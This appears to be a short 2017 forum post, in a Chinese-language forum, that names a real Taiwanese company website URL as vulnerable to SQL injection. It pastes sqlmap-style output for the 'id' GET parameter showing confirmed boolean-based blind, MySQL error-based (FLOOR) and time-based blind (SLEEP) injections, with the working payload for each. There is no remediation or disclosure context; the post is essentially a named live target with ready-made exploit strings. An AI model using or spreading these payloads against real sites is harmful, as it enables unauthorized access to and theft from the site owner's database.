丹堤

0xa 2017-11-22 196

http://www.dante.com.tw/product.php?id=1

Parameter:  id  (GET)
        Type:  boolean-based  blind
        Title:  AND  boolean-based  blind  -  WHERE  or  HAVING  clause
        Payload:  id=1  AND  2598=2598

        Type:  error-based
        Title:  MySQL  >=  5.0  AND  error-based  -  WHERE,  HAVING,  ORDER  BY  or  GROUP  BY  clause  (FLOOR)
        Payload:  id=1  AND  (SELECT  2318  FROM(SELECT  COUNT(*),CONCAT(0x7162766271,(SELECT  (ELT(2318=2318,1))),0x7178706a71,FLOOR(RAND(0)*2))x  FROM  INFORMATION_SCHEMA.PLUGINS  GROUP  BY  x)a)

        Type:  AND/OR  time-based  blind
        Title:  MySQL  >=  5.0.12  AND  time-based  blind
        Payload:  id=1  AND  SLEEP(5)
最新回復 (2)
全部樓主
返回